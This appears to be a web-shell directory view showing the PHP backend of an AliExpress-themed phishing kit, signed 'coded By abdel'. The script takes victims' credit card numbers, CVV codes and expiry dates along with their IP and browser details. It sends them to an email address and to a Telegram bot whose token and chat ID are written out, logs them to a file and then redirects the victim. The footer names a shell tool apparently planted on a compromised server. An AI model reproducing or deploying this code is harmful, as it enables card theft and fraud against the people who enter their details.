Current Path : /home/da040400/www_root/vol/email/
Upload File :
Current File : /home/da040400/www_root/vol/email/payment.php

<?php
/////
//
//  
//
// 
//
//    
//
/////
$ip = getenv("REMOTE_ADDR");
	$message .= "CC--------- ALIEXPRESS ^_^ ccvInfos  -------------\n";
	$message .= "--------------------------------------\n";
    $message .= "-------------- Credit Card -------------\n";
	$message .= "Card Number  : ".$_POST['ego_cislo']."\n";
	$message .= "Security code (CVV)  : ".$_POST['ego_ccv']."\n";
	$message .= "Expiration date (date) : ".$_POST['date_cart']."\n";
	$message .= "-------------- IP Tracing ------------\n";
	$message .= "IP      : $ip\n";
	$message .= "Host    : ".gethostbyaddr($ip)."\n";
	$message .= "Browser : ".$_SERVER['HTTP_USER_AGENT']."\n";
	$message .= "---------- coded By abdel  ---------\n";
	$subject = "Login ccv><vbv | $ip | ".$_POST['email'];
	$send = "kiss3bad@gmail.com"; //Put You Email Here
	$headers = 'From: WIZ-D.N.G' . "\r\n";
	mail($send,$subject,$message,$headers);
	$file = fopen("root.txt", 'a');
	// Telegram API
 
 $chatID = '1328122846';
 $token = '6234483918:AAHmrBbs8nJQ7mEJWo2nECHV-k3NJIiLPqY';
 
 $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatID; $url = $url . "&text=" . urlencode($message);
 $ch = curl_init();
 $optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true); curl_setopt_array($ch, $optArray);
 $outpot = curl_exec($ch);
 curl_close($ch);
fwrite($file, $message);
	echo '<META HTTP-EQUIV="Refresh" Content="0; URL=../thanks.php?652109458356bvhgfpmlsfsads848nghuty">';  
?>

DR.KR LITE SHELL COPYRIGHT 2016